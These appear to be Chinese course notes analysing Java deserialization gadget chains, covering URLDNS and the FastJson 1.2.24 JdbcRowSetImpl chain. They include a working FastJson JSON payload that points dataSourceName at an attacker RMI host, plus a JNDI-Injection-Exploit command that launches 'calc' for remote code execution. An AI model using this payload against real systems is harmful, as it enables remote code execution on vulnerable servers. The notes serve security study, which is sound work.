#知识点

1、安全开发-JavaEE-原生序列化-URLDNS链分析

2、安全开发-JavaEE-FastJson-JdbcRowSetImpl链分析

一、利用链

利用链也叫"gadget chains"，我们通常称为gadget：

1、共同条件：实现Serializable或者Externalizable接口，最好是jdk自带或者JAVA常用组件里有

2、入口类source：（重写readObject 调用常见函数 参数类型宽泛 最好jdk自带）

3、调用链gadget chain：相同方法名、相同类型

4、执行类sink：RCE SSRF 写文件等等

二、原生反序列化及URLDNS链分析（JDK自带链）

1、核心：java.util.HashMap实现了Serializable接口满足条件后，通过HashMap里面的hash到key.hashCode()，key的转变URL类，再到hashCode为-1触发URLStreamHandler.hashCode（理解如下链路即可)，

从文件HashMap.java->实例化HashMap对象（将把此对象进行序列化）->发现该文件里面有readObject()存在反序列化的可能

HashMap->readObject

HashMap->putVal(put)(     

HashMap->hash

key.hashCode->

URL.hashCode->

handler.hashCode->

URLStreamHandler.getHostAddress

2、写利用链：

参考：https://mp.weixin.qq.com/s/R3c5538ZML2yCF9pYUky6g

搞清楚入口类，需要修改的值，需要传递的值，

创建一个HashMap泛型，（后续操作URL类即int类型值）

在创建一个url连接，（将要请求的地址写入对应代码的U）

用put方法把url数据存放到里面，触发putVal(hash(key)

其中hash里面会调用key.hashCode()

最终触发点是key，所以我们就需要给key的类型设置成URL类，

通过逻辑让hashCode的值为-1后调用handler.hashCode即URLStreamHandler.hashCode，最终调用里面的getHostAddress实现

三、FastJson反序列化及JdbcRowSetImp链分析（JDK自带链）：

参考：https://mp.weixin.qq.com/s/t8sjv0Zg8_KMjuW4t-bE-w

FastJson是啊里巴巴的的开源库，用于对JSON格式的数据进行解析和打包。其实简单的来说就是处理json格式的数据的。例如将json转换成一个类。或者是将一个类转换成一段json数据。Fastjson 是一个 Java 库，提供了Java 对象与 JSON 相互转换。

<dependency>   //pom.xml文件中配置fastjson依赖（第三方库）

<groupId>com.alibaba</groupId>

<artifactId>fastjson</artifactId>

<version>1.2.24</version>

</dependency>

四、应用知识：

1、序列化方法：

JSON.toJSONString()，返回字符串；

JSON.toJSONBytes()，返回byte数组；

2、反序列化方法：

JSON.parseObject()，返回JsonObject；

JSON.parse()，返回Object；

JSON.parseArray(), 返回JSONArray；

将JSON对象转换为java对象：JSON.toJavaObject()；

将JSON对象写入write流：JSON.writeJSONString()；

3、常用：

JSON.toJSONString(),JSON.parse(),JSON.parseObject()

5、使用fastjson引出安全问题：

①前提："序列化"操作->固定类后：

反序列化使用parse方法->在调用时会调用set方法

反序列化使用parseObject->在调用时会调用set和get方法

②前提："反序列化"操作->指定类后：

反序列化使用parseObject->在调用时会调用set方法

反序列化使用parse（）->则不会调用set方法

6、安全利用链：（理解这条链即可）

JDK自带链-JdbcRowSetImpl：

①以下为设置信任远程服务器加载的对象

System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

②String payload = "{" +

"\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +  //固定类的反序列化对象

"\"dataSourceName\":\"rmi://xx.xx.xx.xx/xxxx\", " +  //改动的成员变量dataSourceName

"\"autoCommit\":true" +  //改动的成员变量 autoCommit

"}";

JSON.parse(payload);  ->用parse（）进行反序列化操作->会调用反序列化对象的set方法（关键点）

③利用链寻找

反序列化对象：com.sun.rowset.JdbcRowSetImpl

改动的成员变量：dataSourceName autoCommit

分析用parse（）进行反序列化操作->调用反序列化对象的两个set方法

setdataSourceName->getdataSourceName

setautoCommit->connect->DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());

由于"\"dataSourceName\":\"rmi://xx.xx.xx.xx/xxxx\", "《=》this.getDataSourceName()触发以下注入

④RMI注入：触发RCE

DataSource var2 = (DataSource)var1.lookup("rmi://192.168.1.2:1099/jvelrl");

工具生成rmi:

在代码中替换rmi

运行代码RCE成功

var1.lookup RMI协议远程调用（引出下节课将讲到）

autoCommit->setAutoCommit->

this.connect()->var1.lookup(this.getDataSourceName());

生成RMI恶意调用类：java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc"

实战：

servlet启动网站post传递参数json={.........payload.........};

rce利用

总结：

1、理解URLDNS链分析，fastjson引出安全问题的链分析，从突破口一直追踪到具体的利用方法

2、fastjson中的parse与parseobject两种反序列化方法，会调用序列化对象中存在的set或get方法，具体看是否固定类->是产生与分析安全漏洞利用链的关键